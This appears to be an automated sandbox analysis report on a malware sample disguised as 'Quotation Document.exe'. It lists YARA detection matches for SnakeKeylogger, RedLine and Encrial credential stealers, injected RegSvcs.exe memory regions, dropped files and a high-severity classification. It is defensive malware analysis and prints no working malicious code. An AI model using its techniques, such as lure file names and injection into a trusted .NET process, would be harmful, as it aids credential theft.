Source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 8080, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: Quotation Document.exe
Source: initial sample	Static PE information: Filename: Quotation Document.exe

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00408C60	7_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040DC11	7_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00407C3F	7_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00418CCC	7_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00406CA0	7_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_004028B0	7_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0041A4BE	7_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00408C60	7_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00418244	7_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00401650	7_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00402F20	7_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_004193C4	7_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00418788	7_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00402F89	7_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00402B90	7_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_004073A0	7_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02931443	7_2_02931443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02931448	7_2_02931448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_029311A4	7_2_029311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_029311A8	7_2_029311A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_050FBF20	7_2_050FBF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_050F4648	7_2_050F4648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_050FB850	7_2_050FB850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_050F7330	7_2_050F7330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_050FF4E4	7_2_050FF4E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_050FF4F0	7_2_050FF4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_050F463A	7_2_050F463A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_050FAEA8	7_2_050FAEA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_050FF93B	7_2_050FF93B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_050FF948	7_2_050FF948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_050FF08B	7_2_050FF08B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_050FF098	7_2_050FF098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_050F7321	7_2_050F7321
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_050F83EB	7_2_050F83EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_064D9F09	7_2_064D9F09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_064D3430	7_2_064D3430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_064D14BC	7_2_064D14BC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: String function: 0040E1D8 appears 43 times

Source: Quotation Document.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 8080, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@8/3@3/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

7_2_004019F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

7_2_004019F0

Source: C:\Users\user\Desktop\Quotation Document.exe

File created: C:\Users\user\AppData\Local\emboweling

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Quotation Document.exe

File created: C:\Users\user\AppData\Local\Temp\bohmite

Jump to behavior

Source: unknown

